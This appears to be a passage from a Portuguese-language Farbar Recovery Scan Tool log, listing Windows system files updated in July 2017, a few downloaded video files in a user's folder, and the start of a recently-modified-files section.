2017-07-12 09:28 - 2017-06-20 03:16 - 000335776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-07-12 09:28 - 2017-06-20 03:15 - 000233376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-07-12 09:28 - 2017-06-20 03:11 - 001395152 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-07-12 09:28 - 2017-06-20 03:11 - 000411992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2017-07-12 09:28 - 2017-06-20 03:10 - 002327456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-07-12 09:28 - 2017-06-20 03:10 - 001930320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2017-07-12 09:28 - 2017-06-20 03:08 - 001242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-07-12 09:28 - 2017-06-20 03:05 - 001057832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2017-07-12 09:28 - 2017-06-20 03:04 - 004847424 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-07-12 09:28 - 2017-06-20 03:03 - 000820128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-07-12 09:28 - 2017-06-20 03:03 - 000102312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialUIBroker.exe
2017-07-12 09:28 - 2017-06-20 03:00 - 000142752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-07-12 09:28 - 2017-06-20 02:59 - 006554928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-07-12 09:28 - 2017-06-20 02:59 - 001220072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-07-12 09:28 - 2017-06-20 02:59 - 000467504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2017-07-12 09:28 - 2017-06-20 02:58 - 000833160 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2017-07-12 09:28 - 2017-06-20 02:57 - 002681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-07-12 09:28 - 2017-06-20 02:57 - 000204192 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-07-12 09:28 - 2017-06-20 02:15 - 001620368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2017-07-12 09:28 - 2017-06-20 02:14 - 001150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-07-12 09:28 - 2017-06-20 02:13 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2017-07-12 09:28 - 2017-06-20 02:12 - 000293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-07-12 09:28 - 2017-06-20 02:12 - 000115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2017-07-12 09:28 - 2017-06-20 02:11 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
2017-07-12 09:28 - 2017-06-20 02:11 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-07-12 09:28 - 2017-06-20 02:10 - 000722432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-07-12 09:28 - 2017-06-20 02:10 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-07-12 09:28 - 2017-06-20 02:10 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll
2017-07-12 09:28 - 2017-06-20 02:10 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-07-12 09:28 - 2017-06-20 02:09 - 000551424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll
2017-07-12 09:28 - 2017-06-20 02:09 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Narrator.exe
2017-07-12 09:28 - 2017-06-20 02:09 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll
2017-07-12 09:28 - 2017-06-20 02:09 - 000208384 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-07-12 09:28 - 2017-06-20 02:09 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
2017-07-12 09:28 - 2017-06-20 02:09 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-07-12 09:28 - 2017-06-20 02:08 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-07-12 09:28 - 2017-06-20 02:08 - 000386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-07-12 09:28 - 2017-06-20 02:08 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2017-07-12 09:28 - 2017-06-20 02:08 - 000327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2017-07-12 09:28 - 2017-06-20 02:08 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-07-12 09:28 - 2017-06-20 02:08 - 000251392 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-07-12 09:28 - 2017-06-20 02:07 - 000823296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2017-07-12 09:28 - 2017-06-20 02:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2017-07-12 09:28 - 2017-06-20 02:07 - 000626176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2017-07-12 09:28 - 2017-06-20 02:07 - 000510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-07-12 09:28 - 2017-06-20 02:06 - 000942592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-07-12 09:28 - 2017-06-20 02:06 - 000847872 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-07-12 09:28 - 2017-06-20 02:06 - 000751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-07-12 09:28 - 2017-06-20 02:06 - 000411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-07-12 09:28 - 2017-06-20 02:06 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-07-12 09:28 - 2017-06-20 02:05 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-07-12 09:28 - 2017-06-20 02:05 - 000585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-07-12 09:28 - 2017-06-20 02:05 - 000417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-07-12 09:28 - 2017-06-20 02:05 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-07-12 09:28 - 2017-06-20 02:04 - 001818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-07-12 09:28 - 2017-06-20 02:04 - 001425920 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe
2017-07-12 09:28 - 2017-06-20 02:04 - 001177600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2017-07-12 09:28 - 2017-06-20 02:04 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2017-07-12 09:28 - 2017-06-20 02:04 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2017-07-12 09:28 - 2017-06-20 02:04 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2017-07-12 09:28 - 2017-06-20 02:03 - 002077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-07-12 09:28 - 2017-06-20 02:01 - 004536320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-07-12 09:28 - 2017-06-20 02:01 - 004396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-07-12 09:28 - 2017-06-20 02:01 - 003803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-07-12 09:28 - 2017-06-20 02:00 - 002171392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-07-12 09:28 - 2017-06-20 01:59 - 002938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-07-12 09:28 - 2017-06-20 01:59 - 001674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-07-12 09:28 - 2017-06-20 01:56 - 000985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-07-12 09:28 - 2017-06-20 01:54 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll
2017-07-12 09:28 - 2017-06-20 01:45 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2017-07-12 09:28 - 2017-06-20 01:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-07-12 09:28 - 2017-06-20 01:43 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-07-12 09:28 - 2017-06-20 01:43 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-07-12 09:28 - 2017-06-20 01:42 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-07-12 09:28 - 2017-06-20 01:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-07-12 09:28 - 2017-06-20 01:38 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-07-12 09:28 - 2017-06-20 01:37 - 002008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-07-12 09:27 - 2017-07-07 04:27 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-07-12 09:27 - 2017-07-07 04:27 - 001024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-07-12 09:27 - 2017-07-07 04:27 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-07-12 09:27 - 2017-07-07 04:27 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-07-12 09:27 - 2017-07-07 04:27 - 000750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-07-12 09:27 - 2017-07-07 04:22 - 000119384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll
2017-07-12 09:27 - 2017-07-07 04:17 - 001017760 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-07-12 09:27 - 2017-07-07 04:15 - 002444696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-07-12 09:27 - 2017-07-07 04:14 - 005477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-07-12 09:27 - 2017-07-07 04:14 - 001171032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2017-07-12 09:27 - 2017-07-07 04:13 - 000872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-07-12 09:27 - 2017-07-07 04:13 - 000147800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll
2017-07-12 09:27 - 2017-07-07 04:12 - 000228256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-07-12 09:27 - 2017-07-07 04:11 - 007904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-07-12 09:27 - 2017-07-07 04:10 - 021353208 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-07-12 09:27 - 2017-07-07 04:10 - 001337848 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-07-12 09:27 - 2017-07-07 04:10 - 000372128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-07-12 09:27 - 2017-07-07 03:27 - 003670016 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-07-12 09:27 - 2017-07-07 03:27 - 001640448 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-07-12 09:27 - 2017-07-07 03:27 - 001050624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-07-12 09:27 - 2017-07-07 03:27 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2017-07-12 09:27 - 2017-07-07 03:27 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll
2017-07-12 09:27 - 2017-07-07 03:27 - 000443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-07-12 09:27 - 2017-07-07 03:25 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-07-12 09:27 - 2017-07-07 03:24 - 000114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll
2017-07-12 09:27 - 2017-07-07 03:23 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-07-12 09:27 - 2017-07-07 03:23 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll
2017-07-12 09:27 - 2017-07-07 03:22 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-07-12 09:27 - 2017-07-07 03:22 - 000520704 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-07-12 09:27 - 2017-07-07 03:21 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2017-07-12 09:27 - 2017-07-07 03:21 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-07-12 09:27 - 2017-07-07 03:19 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-07-12 09:27 - 2017-07-07 03:19 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-07-12 09:27 - 2017-07-07 03:19 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\raschap.dll
2017-07-12 09:27 - 2017-07-07 03:18 - 000563712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2017-07-12 09:27 - 2017-07-07 03:17 - 001878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-07-12 09:27 - 2017-07-07 03:17 - 001260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-07-12 09:27 - 2017-07-07 03:17 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-07-12 09:27 - 2017-07-07 03:17 - 000229888 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-07-12 09:27 - 2017-07-07 03:16 - 000925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-07-12 09:27 - 2017-07-07 03:14 - 001802240 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-07-12 09:27 - 2017-07-07 03:14 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-07-12 09:27 - 2017-07-07 03:13 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-07-12 09:27 - 2017-07-07 03:12 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-07-12 09:27 - 2017-07-07 03:12 - 002055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-07-12 09:27 - 2017-07-07 03:12 - 001713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2017-07-12 09:27 - 2017-07-07 03:12 - 001420800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-07-12 09:27 - 2017-07-07 03:12 - 001305088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-07-12 09:27 - 2017-07-07 03:12 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-07-12 09:27 - 2017-07-07 03:11 - 003139584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2017-07-12 09:27 - 2017-07-07 03:11 - 002649600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-07-12 09:27 - 2017-07-07 03:11 - 002177024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll
2017-07-12 09:27 - 2017-07-07 03:11 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-07-12 09:27 - 2017-07-07 03:11 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-07-12 09:27 - 2017-07-07 03:10 - 004707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-07-12 09:27 - 2017-07-07 03:10 - 002444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-07-12 09:27 - 2017-07-07 03:07 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2017-07-12 09:27 - 2017-07-07 03:07 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2017-07-12 09:27 - 2017-07-07 03:05 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe
2017-07-12 09:27 - 2017-07-07 03:04 - 001703424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2017-07-12 09:27 - 2017-07-07 03:04 - 001403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdc.dll
2017-07-12 09:27 - 2017-06-20 03:18 - 001564576 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-07-12 09:27 - 2017-06-20 03:18 - 000096672 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-07-12 09:27 - 2017-06-20 03:17 - 000629152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-07-12 09:27 - 2017-06-20 03:17 - 000544160 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-07-12 09:27 - 2017-06-20 03:17 - 000334240 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-07-12 09:27 - 2017-06-20 03:17 - 000136096 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-07-12 09:27 - 2017-06-20 03:16 - 001214880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-07-12 09:27 - 2017-06-20 03:04 - 000472728 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-07-12 09:27 - 2017-06-20 03:03 - 000179608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-07-12 09:27 - 2017-06-20 03:02 - 002645688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-07-12 09:27 - 2017-06-20 03:02 - 000426912 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-07-12 09:27 - 2017-06-20 03:00 - 000558920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-07-12 09:27 - 2017-06-20 03:00 - 000255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-07-12 09:27 - 2017-06-20 02:59 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-07-12 09:27 - 2017-06-20 02:59 - 000583304 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2017-07-12 09:27 - 2017-06-20 02:58 - 000406072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-07-12 09:27 - 2017-06-20 02:58 - 000203168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2017-07-12 09:27 - 2017-06-20 02:16 - 000970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll
2017-07-12 09:27 - 2017-06-20 02:16 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2017-07-12 09:27 - 2017-06-20 02:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys
2017-07-12 09:27 - 2017-06-20 02:13 - 000216064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-12 09:27 - 2017-06-20 02:13 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2017-07-12 09:27 - 2017-06-20 02:13 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgr.dll
2017-07-12 09:27 - 2017-06-20 02:12 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll
2017-07-12 09:27 - 2017-06-20 02:12 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.RetailInfo.dll
2017-07-12 09:27 - 2017-06-20 02:10 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll
2017-07-12 09:27 - 2017-06-20 02:10 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2017-07-12 09:27 - 2017-06-20 02:09 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgrSvc.dll
2017-07-12 09:27 - 2017-06-20 02:09 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll
2017-07-12 09:27 - 2017-06-20 02:09 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-07-12 09:27 - 2017-06-20 02:09 - 000205312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2017-07-12 09:27 - 2017-06-20 02:09 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll
2017-07-12 09:27 - 2017-06-20 02:09 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll
2017-07-12 09:27 - 2017-06-20 02:08 - 000791040 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll
2017-07-12 09:27 - 2017-06-20 02:08 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2017-07-12 09:27 - 2017-06-20 02:07 - 000982016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-07-12 09:27 - 2017-06-20 02:07 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2017-07-12 09:27 - 2017-06-20 02:07 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-07-12 09:27 - 2017-06-20 02:07 - 000621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2017-07-12 09:27 - 2017-06-20 02:07 - 000411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-07-12 09:27 - 2017-06-20 02:06 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2017-07-12 09:27 - 2017-06-20 02:06 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2017-07-12 09:27 - 2017-06-20 02:06 - 000253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edputil.dll
2017-07-12 09:27 - 2017-06-20 02:06 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-07-12 09:27 - 2017-06-20 02:05 - 004447744 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-07-12 09:27 - 2017-06-20 02:05 - 002873344 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll
2017-07-12 09:27 - 2017-06-20 02:05 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-07-12 09:27 - 2017-06-20 02:05 - 000873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2017-07-12 09:27 - 2017-06-20 02:05 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2017-07-12 09:27 - 2017-06-20 02:05 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-07-12 09:27 - 2017-06-20 02:05 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-07-12 09:27 - 2017-06-20 02:04 - 000802816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2017-07-12 09:27 - 2017-06-20 02:03 - 001396224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-07-12 09:27 - 2017-06-20 02:02 - 003204096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-07-12 09:27 - 2017-06-20 02:02 - 002804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-07-12 09:27 - 2017-06-20 02:02 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-07-12 09:27 - 2017-06-20 02:02 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-07-12 09:27 - 2017-06-20 02:02 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll
2017-07-12 09:27 - 2017-06-20 02:01 - 003332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-07-12 09:27 - 2017-06-20 02:01 - 003059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-07-12 09:27 - 2017-06-20 02:01 - 001076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-07-12 09:27 - 2017-06-20 02:01 - 000809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2017-07-12 09:27 - 2017-06-20 02:01 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2017-07-12 09:27 - 2017-06-20 02:00 - 003057664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-07-12 09:27 - 2017-06-20 01:59 - 001357824 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-07-12 09:27 - 2017-06-20 01:58 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-07-12 09:27 - 2017-06-20 01:57 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-07-12 09:27 - 2017-06-20 01:57 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMPushRouterCore.dll
2017-07-12 09:27 - 2017-06-20 01:56 - 000600064 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2017-07-12 09:27 - 2017-06-20 01:56 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdmaud.drv
2017-07-10 22:05 - 2017-07-10 22:05 - 003820607 _____ C:\Users\Hercílio\Downloads\1499653859333.webm
2017-07-10 12:24 - 2017-07-10 12:26 - 065127448 _____ C:\Users\Hercílio\Downloads\PUNCH_Quanzhi_Fashi_-_01_MQ.mp4
2017-07-09 23:20 - 2017-07-09 23:23 - 064286427 _____ C:\Users\Hercílio\Downloads\PUNCH_Made_in_Abyss_-_01_MQ.mp4
2017-07-09 18:32 - 2017-07-09 18:39 - 095244290 _____ C:\Users\Hercílio\Downloads\PUNCH_Boku_no_Hero_Academia_2_-_14v2_MQ.mp4
2017-07-04 21:45 - 2017-07-04 21:48 - 081688828 _____ C:\Users\Hercílio\Downloads\PUNCH_Re_Creators_-_01v2_MQ.mp4
 
==================== Um Mês Modificados arquivos e pastas ========
 
(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)
 
2017-08-03 15:34 - 2017-05-06 19:00 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-03 13:09 - 2017-05-06 19:28 - 002038074 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-03 13:09 - 2017-03-20 01:00 - 000842536 _____ C:\WINDOWS\system32\prfh0416.dat
2017-08-03 13:09 - 2017-03-20 01:00 - 000202972 _____ C:\WINDOWS\system32\prfc0416.dat
2017-08-03 13:01 - 2017-05-06 19:37 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-03 11:25 - 2017-03-18 18:01 - 000000000 ____D C:\WINDOWS\INF
